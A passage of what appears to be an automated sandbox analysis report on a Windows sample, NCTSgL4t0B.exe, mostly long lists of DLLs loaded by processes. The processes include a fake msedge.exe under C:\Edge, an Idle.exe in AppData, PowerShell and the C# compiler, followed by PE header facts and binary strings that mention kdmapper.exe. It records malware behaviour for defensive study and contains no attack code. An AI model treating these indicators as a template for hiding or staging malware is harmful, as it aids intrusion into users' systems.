Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: sspicli.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Edge\msedge.exe	Section loaded: ktmw32.dll
Source: C:\Edge\msedge.exe	Section loaded: rasapi32.dll
Source: C:\Edge\msedge.exe	Section loaded: rasman.dll
Source: C:\Edge\msedge.exe	Section loaded: rtutils.dll
Source: C:\Edge\msedge.exe	Section loaded: mswsock.dll
Source: C:\Edge\msedge.exe	Section loaded: winhttp.dll
Source: C:\Edge\msedge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Edge\msedge.exe	Section loaded: iphlpapi.dll
Source: C:\Edge\msedge.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Edge\msedge.exe	Section loaded: dhcpcsvc.dll
Source: C:\Edge\msedge.exe	Section loaded: dnsapi.dll
Source: C:\Edge\msedge.exe	Section loaded: winnsi.dll
Source: C:\Edge\msedge.exe	Section loaded: rasadhlp.dll
Source: C:\Edge\msedge.exe	Section loaded: propsys.dll
Source: C:\Edge\msedge.exe	Section loaded: apphelp.dll
Source: C:\Edge\msedge.exe	Section loaded: dlnashext.dll
Source: C:\Edge\msedge.exe	Section loaded: wpdshext.dll
Source: C:\Edge\msedge.exe	Section loaded: edputil.dll
Source: C:\Edge\msedge.exe	Section loaded: urlmon.dll
Source: C:\Edge\msedge.exe	Section loaded: iertutil.dll
Source: C:\Edge\msedge.exe	Section loaded: srvcli.dll
Source: C:\Edge\msedge.exe	Section loaded: netutils.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Edge\msedge.exe	Section loaded: wintypes.dll
Source: C:\Edge\msedge.exe	Section loaded: appresolver.dll
Source: C:\Edge\msedge.exe	Section loaded: bcp47langs.dll
Source: C:\Edge\msedge.exe	Section loaded: slc.dll
Source: C:\Edge\msedge.exe	Section loaded: userenv.dll
Source: C:\Edge\msedge.exe	Section loaded: sppc.dll
Source: C:\Edge\msedge.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Edge\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Edge\msedge.exe	Section loaded: ktmw32.dll
Source: C:\Edge\msedge.exe	Section loaded: rasapi32.dll
Source: C:\Edge\msedge.exe	Section loaded: rasman.dll
Source: C:\Edge\msedge.exe	Section loaded: rtutils.dll
Source: C:\Edge\msedge.exe	Section loaded: mswsock.dll
Source: C:\Edge\msedge.exe	Section loaded: winhttp.dll
Source: C:\Edge\msedge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Edge\msedge.exe	Section loaded: iphlpapi.dll
Source: C:\Edge\msedge.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Edge\msedge.exe	Section loaded: dhcpcsvc.dll
Source: C:\Edge\msedge.exe	Section loaded: dnsapi.dll
Source: C:\Edge\msedge.exe	Section loaded: winnsi.dll
Source: C:\Edge\msedge.exe	Section loaded: rasadhlp.dll
Source: C:\Edge\msedge.exe	Section loaded: propsys.dll
Source: C:\Edge\msedge.exe	Section loaded: apphelp.dll
Source: C:\Edge\msedge.exe	Section loaded: dlnashext.dll
Source: C:\Edge\msedge.exe	Section loaded: wpdshext.dll
Source: C:\Edge\msedge.exe	Section loaded: edputil.dll
Source: C:\Edge\msedge.exe	Section loaded: urlmon.dll
Source: C:\Edge\msedge.exe	Section loaded: iertutil.dll
Source: C:\Edge\msedge.exe	Section loaded: srvcli.dll
Source: C:\Edge\msedge.exe	Section loaded: netutils.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Edge\msedge.exe	Section loaded: wintypes.dll
Source: C:\Edge\msedge.exe	Section loaded: appresolver.dll
Source: C:\Edge\msedge.exe	Section loaded: bcp47langs.dll
Source: C:\Edge\msedge.exe	Section loaded: slc.dll
Source: C:\Edge\msedge.exe	Section loaded: userenv.dll
Source: C:\Edge\msedge.exe	Section loaded: sppc.dll
Source: C:\Edge\msedge.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Idle.exe	Section loaded: ucrtbase_clr0400.dll

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: NCTSgL4t0B.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: NCTSgL4t0B.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NCTSgL4t0B.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NCTSgL4t0B.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NCTSgL4t0B.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NCTSgL4t0B.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NCTSgL4t0B.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: NCTSgL4t0B.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: NCTSgL4t0B.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 0000000C.00000000.1306786234.0000000000E13000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.10.dr
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.pdb source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Release\Fcs.pdb source: curl.exe, 0000000E.00000003.1323956983.000001EBAEA64000.00000004.00000020.00020000.00000000.sdmp
